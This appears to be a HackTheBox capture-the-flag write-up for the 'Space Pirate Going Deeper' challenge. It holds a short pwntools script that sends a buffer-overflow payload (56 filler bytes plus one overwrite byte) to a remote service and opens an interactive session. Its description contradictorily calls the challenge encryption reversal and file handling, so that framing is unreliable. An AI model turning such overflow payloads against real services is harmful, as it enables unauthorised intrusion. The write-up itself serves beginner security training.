HackTheBox Space Pirate Going Deeper Writeup
Explore the basics of cybersecurity in the Space Pirate Going Deeper Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/330
Description
We are inside D12! We bypassed the scanning system, and now we are right in front of the Admin Panel. The problem is that there are some safety mechanisms enabled so that not everyone can access the admin panel and become the user right below Draeger. Only a few of his intergalactic team members have access there, and they are the mutants that Draeger trusts. Can you disable the mechanisms and take control of the Admin Panel?
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
def get_process():
try:
host, port = sys.argv[1].split(':')
return remote(host, int(port))
except IndexError:
print(f'Usage: python {sys.argv[0]} <ip:port>')
exit(1)
r = get_process()
r.recvrepeat(0.1)
r.sendline(b"1")
r.recvrepeat(0.1)
payload = b"A" * 56 + b"\x12"
r.sendline(payload)
r.interactive()
Summary
The Space Pirate Going Deeper Challenge on Hack The Box is a very-easy-level challenge focused on encryption reversal and file handling. It exploits a buffer overflow vulnerability in a remote service. Using Pwntools, the provided Python script sends a crafted payload to trigger the vulnerability, demonstrating basic exploitation techniques and helping beginners understand buffer overflow and remote interaction concepts.